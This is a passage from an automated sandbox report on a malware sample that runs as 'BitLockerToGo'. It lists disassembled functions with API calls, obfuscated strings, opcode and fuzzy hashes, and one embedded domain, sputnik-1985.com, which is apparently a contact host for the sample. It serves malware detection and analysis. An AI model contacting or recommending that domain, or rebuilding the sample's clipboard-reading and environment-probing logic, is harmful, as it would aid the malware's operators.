                                                                                                                                                                                                            • Instruction Fuzzy Hash: A452AF3250C7908BD3249B38C4553AFBBE1ABD5324F198E7EE8D9A33C2D67889458747
                                                                                                                                                                                                            Function 00416F8D Relevance: 15.1, APIs: 4, Strings: 4, Instructions: 1114COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: A$S,3!$bxA$@AF
                                                                                                                                                                                                            • API String ID: 0-2069903589
                                                                                                                                                                                                            • Opcode ID: 51a7bc412986f8b3ea5974b480de9a556fa70d4e40814ebbc0f959896439f117
                                                                                                                                                                                                            • Instruction ID: 6ded76c8cc6ff0f80e96e1d1ae2300ae6fa5ef525a8552055949680e93883b28
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 51a7bc412986f8b3ea5974b480de9a556fa70d4e40814ebbc0f959896439f117
                                                                                                                                                                                                            • Instruction Fuzzy Hash: FF72357150C3418BD324CF28C8907ABB7F2EF96314F19896EE4C587392E7398985CB96
                                                                                                                                                                                                            Function 0042238D Relevance: 13.0, Strings: 10, Instructions: 549COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: "0B$%<$$(99#$OIE{$Z_-c$gM$sputnik-1985.com$-A+$~|$?'
                                                                                                                                                                                                            • API String ID: 0-1527217465
                                                                                                                                                                                                            • Opcode ID: 1a2107a0d9ca9d91116f4215fd163885d8c2ef582804c35b4f29d4efd173d59b
                                                                                                                                                                                                            • Instruction ID: 5c5e0a10dac633df7a7eb912dad582696f6b243f8df0ab356ae229ec7ebc779d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1a2107a0d9ca9d91116f4215fd163885d8c2ef582804c35b4f29d4efd173d59b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D30279726083919FD318CF25D89176BBBE2FBD2314F588A6CE4D18B395D7788805CB86
                                                                                                                                                                                                            Function 004111E9 Relevance: 12.7, APIs: 2, Strings: 5, Instructions: 499COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: ($?$f$u$}
                                                                                                                                                                                                            • API String ID: 0-3561895482
                                                                                                                                                                                                            • Opcode ID: 034806d3cc72206703f70723c548ba8ea1711a660e6f03707adc4ef9bcdfc4e3
                                                                                                                                                                                                            • Instruction ID: 86e3bcde5e116734b7454ff0522683787c5f8ed0e2df54b8e8f55331097e388c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 034806d3cc72206703f70723c548ba8ea1711a660e6f03707adc4ef9bcdfc4e3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B212A371A0D7808BD324DF39C4813AFBBE1ABD5314F198A2FE5D997391D63889418B47
                                                                                                                                                                                                            Function 004237D0 Relevance: 12.7, APIs: 2, Strings: 5, Instructions: 431COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000), ref: 004238A8
                                                                                                                                                                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,6A195A3A), ref: 0042394C
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                            • String ID: 52$QVTH$]VWC$lnmh$n`fn
                                                                                                                                                                                                            • API String ID: 237503144-3964871452
                                                                                                                                                                                                            • Opcode ID: f42c4c6db4055bdca425bc9ce26f544c9401cc625d8d536d0403780354460537
                                                                                                                                                                                                            • Instruction ID: 3b8b4807c8318ae77837d9a5b010143032c821d60a60d601bdcb57454f2de873
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f42c4c6db4055bdca425bc9ce26f544c9401cc625d8d536d0403780354460537
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2FE1457160C3518FD720CF68D8917ABBBE1EB85314F444A3EF99587381D3B89906CB9A
                                                                                                                                                                                                            Function 00432FE0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 142COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: MetricsSystem
                                                                                                                                                                                                            • String ID: $)6C$C7C$Y8C
                                                                                                                                                                                                            • API String ID: 4116985748-1654261340
                                                                                                                                                                                                            • Opcode ID: 5c122eb9c0143f1b49a1e8f4bb7b68f4f6dba1365be09ef1174e0909afcf80c5
                                                                                                                                                                                                            • Instruction ID: 4b006a6d5d8b16d53f58adea831d835725ce84f357d2a915258799e4b83f44bd
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5c122eb9c0143f1b49a1e8f4bb7b68f4f6dba1365be09ef1174e0909afcf80c5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5E817CB45193808FE360DF25C58879EBBE0BB85348F508D2EE4D88B350DBB89549CF5A
                                                                                                                                                                                                            Function 00409140 Relevance: 10.4, Strings: 8, Instructions: 415COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: 2&!w$EW4$IIMC$O!);$T##"$T##"$uP$yt
                                                                                                                                                                                                            • API String ID: 0-2143932533
                                                                                                                                                                                                            • Opcode ID: 09effc1b13daa91b72845bbbe66f33b8a5e808bbdc37d5409809ad00b593fd89
                                                                                                                                                                                                            • Instruction ID: b7e6f6c2e259c59c372040f3070f569a967029d4438ee1149a109cc5271046c8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 09effc1b13daa91b72845bbbe66f33b8a5e808bbdc37d5409809ad00b593fd89
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 64C1147160C3918AD715CF39845036BBFE1AB96314F18896EE8D59B3C3D23DC90AC756
                                                                                                                                                                                                            Function 00438040 Relevance: 10.2, Strings: 8, Instructions: 194COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: %$&$9$<$R$T$W$b
                                                                                                                                                                                                            • API String ID: 0-3780034300
                                                                                                                                                                                                            • Opcode ID: 1461b86cfa4d3767ede56ba77eb50cf2841e928c2e72e09b72740e390ede6aa9
                                                                                                                                                                                                            • Instruction ID: 26f6469176a43b47c6e288f4693b2497bb05b8a0a051c4656522d96c8d770806
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1461b86cfa4d3767ede56ba77eb50cf2841e928c2e72e09b72740e390ede6aa9
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 10719F2250C7C28AD3128A7C484425BEFD25BE7234F2D9FADF4E5873D2C56AC50A9367
                                                                                                                                                                                                            Function 00432D70 Relevance: 9.2, APIs: 6, Instructions: 179clipboardCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Clipboard$CloseDataGlobalLockOpen
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1494355150-0
                                                                                                                                                                                                            • Opcode ID: 07f84929871a5c64471c921f03cbf394aaa8fd21632cc30f04fff1ccf22f28ed
                                                                                                                                                                                                            • Instruction ID: 693f7ef225a156252cf7c29a72516dce540735802ffb423964d4f98d76e8ff95
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 07f84929871a5c64471c921f03cbf394aaa8fd21632cc30f04fff1ccf22f28ed
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5A510572A187614EC310DF7C894521FBAE15BC9224F098B3EE8E4973D1C678890A87D7
                                                                                                                                                                                                            Function 00419820 Relevance: 8.4, APIs: 2, Strings: 2, Instructions: 1415COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 0043D910: LdrInitializeThunk.NTDLL(004409B8,?,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043D93E
                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 00419E7D
                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 00419F1E
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FreeLibrary$InitializeThunk
                                                                                                                                                                                                            • String ID: NO$v
                                                                                                                                                                                                            • API String ID: 764372645-2536501430
                                                                                                                                                                                                            • Opcode ID: e994bf9aca9ffad251a8e8e39955b3cd0e821797c371950e4c131b848a4e05ab
                                                                                                                                                                                                            • Instruction ID: abe4a73a967468b274d366e370c220422a45fd0295e639bb6f5522fed691f7b9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e994bf9aca9ffad251a8e8e39955b3cd0e821797c371950e4c131b848a4e05ab
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 26924975A183419BE724CF24C890B6BBBE3ABD5304F29C82EE08587365D679DC91CB47
                                                                                                                                                                                                            Function 0040A8A0 Relevance: 7.9, Strings: 6, Instructions: 408COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: %"$<$T_XY$UUp$lI$~9
                                                                                                                                                                                                            • API String ID: 0-1611585724
                                                                                                                                                                                                            • Opcode ID: 17319177cc18e58b46021cdb8643903c862ce1f4d13ca6f91d71c1ebdd3c6515
                                                                                                                                                                                                            • Instruction ID: 5cd483bddd2b52e9b22b037f4d3c0dc2645df5a79fafa00e6023d7c932b65d9b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 17319177cc18e58b46021cdb8643903c862ce1f4d13ca6f91d71c1ebdd3c6515
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E7C1067564C3504FD328CFA9949026FBBE2ABD2304F1C853EE5E55B381D679890A878B
                                                                                                                                                                                                            Function 00428F6C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 219COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 00428DFB
                                                                                                                                                                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 00428F3C
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                            • String ID: rM$zM
                                                                                                                                                                                                            • API String ID: 237503144-2784921869
                                                                                                                                                                                                            • Opcode ID: d018b77fafad30eede66eafc2b8166c57735da819279e606327805be91c2026e
                                                                                                                                                                                                            • Instruction ID: 97ddf7a0595f55843d8ed3a5592f022fec3ca497b996ab7f20284500c0a95c28
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d018b77fafad30eede66eafc2b8166c57735da819279e606327805be91c2026e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D661D0F0A443219FE754CF69C991A9ABFB0FB46350F1A42ADE4459F392C3748842CBD5
                                                                                                                                                                                                            Function 00426360 Relevance: 6.9, Strings: 5, Instructions: 628COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: Sin;$YzW+$dMKP$lmeH$xHLG
                                                                                                                                                                                                            • API String ID: 0-2485238161
                                                                                                                                                                                                            • Opcode ID: 53c1c3e7beeb02a5bfbe861942d4d5c87f2e832a164556a30a5f60c8f53b826b
                                                                                                                                                                                                            • Instruction ID: 4aad12527c045970d6953cacdb77c585329f148e38e5d38ad86dba377078a4b1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 53c1c3e7beeb02a5bfbe861942d4d5c87f2e832a164556a30a5f60c8f53b826b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0A2255B16083918FD7109F29E85136BBBE1EF86304F09887EE5C59B381D739D906CB5A
                                                                                                                                                                                                            Function 00418740 Relevance: 6.6, Strings: 5, Instructions: 346COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: 3$h2h0$AC$EFG$^
                                                                                                                                                                                                            • API String ID: 0-608315617
                                                                                                                                                                                                            • Opcode ID: d53e257c2075918734cd9bcba6b5da5e0b46016a60d2228bb7ca5af722daeddf
                                                                                                                                                                                                            • Instruction ID: d3f7bcd23a71bb6fca4cd7d9fe77f5dce33f5e25f3cb76845b8540b24cd68cf4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d53e257c2075918734cd9bcba6b5da5e0b46016a60d2228bb7ca5af722daeddf
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6CC19EB15083918BD334CF29C4913EBBBE1EFD2314F058A2DD8D95B290EB799845CB86
                                                                                                                                                                                                            Function 00408EF0 Relevance: 6.5, Strings: 5, Instructions: 259COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: 3DJ$@DrF$AH3$QmST$geYd
                                                                                                                                                                                                            • API String ID: 0-2788220846
                                                                                                                                                                                                            • Opcode ID: 32799a698c3d96bb907ba3f325351d66fd8decef381e36e4e78d77a0d004097b
                                                                                                                                                                                                            • Instruction ID: 4f858eabc2a1050b4af87be1a3efc61e7958397d893593ca31e805b38df32c69
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 32799a698c3d96bb907ba3f325351d66fd8decef381e36e4e78d77a0d004097b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A051C42014D3D29AD3118F3984E039BFFE0AFA3304F18556EE8D45B386D33A891AD766
                                                                                                                                                                                                            Function 00427CB0 Relevance: 5.8, APIs: 2, Strings: 1, Instructions: 599COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 00427DC0
                                                                                                                                                                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 00427E49
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                            • String ID: 7e1
                                                                                                                                                                                                            • API String ID: 237503144-1127181755
                                                                                                                                                                                                            • Opcode ID: 1b39cba85f7465282da7a1db2dc4396b6ecffed7ed28ec75b176153d7ede6d44
                                                                                                                                                                                                            • Instruction ID: c73f166b7c42da4403d63bb3e24580fd4c4d4143f2e15d469fbc9f0eaa75cdd5
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1b39cba85f7465282da7a1db2dc4396b6ecffed7ed28ec75b176153d7ede6d44
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DB121471E04228CFDB14CF68D8917AEB7B1FF55310F1481AED846AB382DB389946CB95
                                                                                                                                                                                                            Function 00427A5A Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 561COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 00427E49
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                            • String ID: 7e1${B
                                                                                                                                                                                                            • API String ID: 237503144-3235371320
                                                                                                                                                                                                            • Opcode ID: 1d05c416a86f48728e9a28166568a4afb16117623205e21ac6177041c8dc3b66
                                                                                                                                                                                                            • Instruction ID: 95f0cad8862f2af99a7bb935661dc1960fd3b24764110846962f877ea0b9236a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1d05c416a86f48728e9a28166568a4afb16117623205e21ac6177041c8dc3b66
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F4021571E08224CFDB14CF68D8917AEB7B1FF95314F1481AED846AB381DB389942CB95
                                                                                                                                                                                                            Function 00427B08 Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 549COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 00427E49
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                            • String ID: 7e1${B
                                                                                                                                                                                                            • API String ID: 237503144-3235371320
                                                                                                                                                                                                            • Opcode ID: 6a17e22f67e02696a72774e7070fabe38b7a2f0cdbdf55b684643e6438018d23
                                                                                                                                                                                                            • Instruction ID: ffbaa110a31002c00b33609662cf676e3cfc5359165e1e1bb80dc834af8824ee
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6a17e22f67e02696a72774e7070fabe38b7a2f0cdbdf55b684643e6438018d23
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 74023471E08224CFDB14CF64D8917AEB7B1FF95314F1481ADD846AB382DB389942CB95
                                                                                                                                                                                                            Function 00415966 Relevance: 5.6, Strings: 4, Instructions: 563COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: D$FaA$U2F0$ZyZ{
                                                                                                                                                                                                            • API String ID: 0-749592270
                                                                                                                                                                                                            • Opcode ID: 8c69aeefe26d6d9b90fb91318175841bfacd509f508cea8d3782fff8491dd287
                                                                                                                                                                                                            • Instruction ID: a205d1b6f2728990741de773bc6b50b2cd9b8380381c49761b832d911385fcab
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8c69aeefe26d6d9b90fb91318175841bfacd509f508cea8d3782fff8491dd287
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1202ABB1508391CBD3248F25C4617ABBBF1EFC2359F158A1DE4CA4B391E3798885CB96
                                                                                                                                                                                                            Function 0041DE90 Relevance: 4.6, Strings: 3, Instructions: 867COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: J$n~xx$urz|
                                                                                                                                                                                                            • API String ID: 0-3220001382
                                                                                                                                                                                                            • Opcode ID: b31e8aa4af254f48f2630a33910aa6890d488a9be7c75a24b6ff0c3cf5e54a69
                                                                                                                                                                                                            • Instruction ID: 6a91fd7be6a80c1624e75f382a73f26f0e074c3cb1dfdb16b98c5d7a18dbd3f0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b31e8aa4af254f48f2630a33910aa6890d488a9be7c75a24b6ff0c3cf5e54a69
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7652BB7850C3918FC725CF29C8506AFBBE1AF95314F084B6DE8E547392D7399805CB9A
                                                                                                                                                                                                            Function 00417FE1 Relevance: 4.3, Strings: 3, Instructions: 580COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: BDE:$L4$L4
                                                                                                                                                                                                            • API String ID: 0-3692522541
                                                                                                                                                                                                            • Opcode ID: be6432e084263a3291549fe13bd0a810b6e47c040b8f48670cceb1158c16825f
                                                                                                                                                                                                            • Instruction ID: dd390c41524992b3b41842bda6cd178197e7fbbdd3d64fed8634c62cd5e5b5ab
                                                                                                                                                                                                            • Opcode Fuzzy Hash: be6432e084263a3291549fe13bd0a810b6e47c040b8f48670cceb1158c16825f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: FF125C72A082519FD724CF28C8517AFB3E2EBD5314F19893ED48AC7351DB389841CB8A
                                                                                                                                                                                                            Function 0041C3CC Relevance: 4.3, Strings: 3, Instructions: 574COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: :G!A$Vw1q${u
                                                                                                                                                                                                            • API String ID: 0-645793561
                                                                                                                                                                                                            • Opcode ID: 5aabdbd3031ce8a4584c980d2b67a6b8cdd154d9a8e847e6682a9da6037f3857
                                                                                                                                                                                                            • Instruction ID: e35f9824382157240d3d87f0a1d15c17bfd725fbec35765ed2db11ef4fc98c05
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5aabdbd3031ce8a4584c980d2b67a6b8cdd154d9a8e847e6682a9da6037f3857
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6C0242B5900216CFDB14CF29C8815FBBBB2FF56310F188569E855AB342E338A991CBD5
                                                                                                                                                                                                            Function 00439C70 Relevance: 4.2, Strings: 3, Instructions: 441COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: $0Qx$*0Qx$`a
                                                                                                                                                                                                            • API String ID: 0-2354730689
                                                                                                                                                                                                            • Opcode ID: 7bdbeef81bf970ed795b7748677985d075231058f587ee6d2346d196102fc5af
                                                                                                                                                                                                            • Instruction ID: 6e7c93c0a148da01ad464f35dcf862257e7f2efdc77a60f70c0a7fadf4f8a59e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7bdbeef81bf970ed795b7748677985d075231058f587ee6d2346d196102fc5af
